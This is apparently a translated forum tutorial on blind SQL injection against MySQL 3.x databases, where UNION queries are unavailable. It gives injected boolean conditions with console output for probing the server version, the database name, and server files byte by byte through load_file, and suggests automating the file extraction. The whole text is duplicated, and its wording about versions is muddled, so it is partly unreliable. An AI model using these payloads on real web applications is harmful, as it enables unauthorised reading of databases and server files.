MySQL 3.0 injection
The injection of mysql mainly relies on union joint query, but union is only useful for version 4.0 or above, but for those below 3.0 or below. . . . . . . . . .
Therefore, it is impossible to use union for cross-table query in the mysql 3.0 database, but you can use load_file
But you can't just use union to replace it. Here is my idea:
Get version:
mysql> select * from user where userid=1 and length(version())<10;
Empty set (0.00 sec)
mysql> select * from user where userid=1 and length(version())<1777;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | angel | mypass |
+--------+----------+----------+
1 row in set (0.00 sec)
Get the current database:
mysql> select * from user where userid=1 and length(database())>0;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | angel | mypass |
+--------+----------+----------+
1 row in set (0.00 sec)
Breaking file code:
mysql> select * from user where userid=1 and ascii(mid(load_file('c:/'),1,1))<1;
Empty set (0.05 sec)
mysql> select * from user where userid=1 and ascii(mid(load_file('c:/'),1,1))>1;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | angel | mypass |
+--------+----------+----------+
1 row in set (0.00 sec)
Because of the large workload, it can be implemented using programs (but it is also very troublesome)
Another idea: You can first use the character processing function to get the "position of special characters". If we are blasting the file, we can choose "localhost" (or other) as a special character, first get the location (which byte) and guess the nearest it, which can save a lot of work.
The injection of mysql mainly relies on union joint query, but union is only useful for version 4.0 or above, but for those below 3.0 or below. . . . . . . . . .
Therefore, it is impossible to use union for cross-table query in the mysql 3.0 database, but you can use load_file
But you can't just use union to replace it. Here is my idea:
Get version:
mysql> select * from user where userid=1 and length(version())<10;
Empty set (0.00 sec)
mysql> select * from user where userid=1 and length(version())<1777;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | angel | mypass |
+--------+----------+----------+
1 row in set (0.00 sec)
Get the current database:
mysql> select * from user where userid=1 and length(database())>0;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | angel | mypass |
+--------+----------+----------+
1 row in set (0.00 sec)
Breaking file code:
mysql> select * from user where userid=1 and ascii(mid(load_file('c:/'),1,1))<1;
Empty set (0.05 sec)
mysql> select * from user where userid=1 and ascii(mid(load_file('c:/'),1,1))>1;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | angel | mypass |
+--------+----------+----------+
1 row in set (0.00 sec)
Because of the large workload, it can be implemented using programs (but it is also very troublesome)
Another idea: You can first use the character processing function to get the "position of special characters". If we are blasting the file, we can choose "localhost" (or other) as a special character, first get the location (which byte) and guess the nearest it, which can save a lot of work.